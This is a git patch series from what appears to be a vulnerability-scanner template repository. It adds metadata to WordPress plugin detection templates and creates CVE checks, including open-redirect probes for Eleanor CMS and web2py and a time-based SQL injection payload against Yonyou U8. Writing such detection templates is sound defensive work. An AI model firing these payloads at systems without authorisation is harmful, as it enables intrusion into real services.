@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 082966e07ad080fbe21371c402785bd9fbdb2be8 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Wed, 27 Sep 2023 14:13:02 +0530
Subject: [PATCH 0555/1090] Create CVE-2014-9180.yaml

---
 http/cves/2014/CVE-2014-9180.yaml | 35 +++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 http/cves/2014/CVE-2014-9180.yaml

diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml
new file mode 100644
index 0000000000..1e5f5efc3e
--- /dev/null
+++ b/http/cves/2014/CVE-2014-9180.yaml
@@ -0,0 +1,35 @@
+id: CVE-2014-9180
+
+info:
+  name: Eleanor CMS - Open Redirect
+  author: Shankar Acharya
+  severity: medium
+  description: |
+    Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.
+  remediation: |
+    Update to the latest version of Eleanor CMS  to fix the open redirect vulnerability.
+  reference:
+    - https://packetstormsecurity.com/files/129087/Eleanor-CMS-Open-Redirect.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-9180
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/Au:N/C:N/I:P/A:N
+    cvss-score: 5.0
+    cve-id: CVE-2014-9180
+    cwe-id: CWE-601
+  metadata:
+    verified: true
+    product: eleanor_cms
+    vendor: eleanor-cms
+    shodan-query: html:"eleanor"
+  tags: cve,cve2014,eleanor,cms,redirect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/go.php?http://interact.sh"
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

From 334c3be05754ed32e9b39cf95326bcf09d688227 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Wed, 27 Sep 2023 14:38:24 +0530
Subject: [PATCH 0556/1090] Create CVE-2023-22432.yaml

---
 http/cves/2023/CVE-2023-22432.yaml | 48 ++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-22432.yaml

diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml
new file mode 100644
index 0000000000..d14a85b4d4
--- /dev/null
+++ b/http/cves/2023/CVE-2023-22432.yaml
@@ -0,0 +1,48 @@
+id: CVE-2023-22432
+
+info:
+  name: web2py URL - Open Redirect
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.
+  remediation: |
+    Update to web2py 2.23.1 or higher.
+  reference:
+    - https://github.com/aeyesec/CVE-2023-22432
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-22432
+    - https://jvn.jp/en/jp/JVN78253670/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-22432
+    cwe-id: CWE-601
+    epss-score: 0.00052
+    epss-percentile: 0.18528
+    cpe: cpe:2.3:a:web2py:web2py:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: web2py
+    product: web2py
+  tags: cve,cve2023,web2py,redirect
+
+http:
+  - raw:
+      - |
+        POST /admin/default/index HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{RootURL}}/admin/default/index/?send=\/\/oast.pro
+
+        password={{password}}&send=%5C%2F%5C%2Foast.pro&login=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'a href="\/\/oast.pro"'
+
+      - type: status
+        status:
+          - 303

From dc6b9c1e731a300592919f6a6ac4df4bde214eb3 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Wed, 27 Sep 2023 14:39:20 +0530
Subject: [PATCH 0557/1090] metadata update

---
 http/cves/2023/CVE-2023-22432.yaml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml
index d14a85b4d4..f58a94d63f 100644
--- a/http/cves/2023/CVE-2023-22432.yaml
+++ b/http/cves/2023/CVE-2023-22432.yaml
@@ -24,7 +24,9 @@ info:
     max-request: 1
     vendor: web2py
     product: web2py
-  tags: cve,cve2023,web2py,redirect
+    verified: true
+    shodan-query: http.favicon.hash:-1680052984
+  tags: cve,cve2023,web2py,redirect,authenticated
 
 http:
   - raw:

From 446532191f48e691d5e1feaea5f1e57879a23a66 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Wed, 27 Sep 2023 16:52:56 +0530
Subject: [PATCH 0558/1090] Create yonyou-u8-sqli.yaml

---
 .../yonyou/yonyou-u8-sqli.yaml                | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml

diff --git a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
new file mode 100644
index 0000000000..cd91ba6607
--- /dev/null
+++ b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
@@ -0,0 +1,35 @@
+id: yonyou-u8-sqli
+
+info:
+  name: Yonyou U8 - bx_historyDataCheck SQL Injection
+  author: xianke
+  severity: high
+  description: |
+    Yonyou U8 Grp contains a SQL injection vulnerability.
+  reference:
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-bx_historyDataChecks-sqli.yaml
+    - https://github.com/MD-SEC/MDPOCS/blob/main/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py
+  metadata:
+    max-request: 1
+    fofa-query: icon_hash="-299520369"
+    verified: true
+  tags: yonyou,grp,sqli
+
+http:
+  - raw:
+      - |
+        POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Content-Type: application/x-www-form-urlencoded
+
+        userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(content_length, "11")'
+        condition: and

From 366d4a37b809533c9f6cc8e07d739914bbbfc7b1 Mon Sep 17 00:00:00 2001
From: joaonevess 
Date: Wed, 27 Sep 2023 08:54:47 -0300
Subject: [PATCH 0559/1090] Fixed dns/elasticbeanstalk-takeover Template

---
 dns/elasticbeanstalk-takeover.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/dns/elasticbeanstalk-takeover.yaml b/dns/elasticbeanstalk-takeover.yaml
index 60dbebb4cb..3e4af216b6 100644
--- a/dns/elasticbeanstalk-takeover.yaml
+++ b/dns/elasticbeanstalk-takeover.yaml
@@ -2,7 +2,7 @@ id: elasticbeanstalk-takeover
 
 info:
   name: ElasticBeanstalk Subdomain Takeover Detection
-  author: philippedelteil,rotemreiss,zy9ard3
+  author: philippedelteil,rotemreiss,zy9ard3,joaonevess
   severity: high
   description: ElasticBeanstalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical
     name (CNAME) in the Domain Name System (DNS), but no host is providing content for it.
@@ -35,7 +35,7 @@ dns:
     matchers:
       - type: regex
         regex:
-          - CNAME\t.*\.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com
+          - CNAME\t.*\.(us|af|ap|ca|eu|me|sa|il)\-(north|east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com
 
       - type: word
         words:

From ebedb7ed930f5beea5ef822f9724ce3e26fb230c Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Wed, 27 Sep 2023 18:38:37 +0530
Subject: [PATCH 0560/1090] Update exposed-gitignore.yaml

---
 http/exposures/configs/exposed-gitignore.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/exposures/configs/exposed-gitignore.yaml b/http/exposures/configs/exposed-gitignore.yaml
index ae3b16c697..9f37942dd9 100644
--- a/http/exposures/configs/exposed-gitignore.yaml
+++ b/http/exposures/configs/exposed-gitignore.yaml
@@ -33,6 +33,7 @@ http:
 
       - type: word
         words:
+          - "MongoDB over HTTP on the native"
           - "application/javascript"
           - "application/x-javascript"
           - "application/json"

From 9cbcb77b2690659b268d8ecaa4d6c8cb03ed36c4 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 27 Sep 2023 13:28:29 +0000
Subject: [PATCH 0562/1090] Auto Generated Templates Checksum [Wed Sep 27
 13:28:29 UTC 2023] :robot:

---
 templates-checksum.txt | 592 ++++++++++++++++++++---------------------
 1 file changed, 296 insertions(+), 296 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 0bbbd267de..d83c5aa6d8 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -5861,218 +5861,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
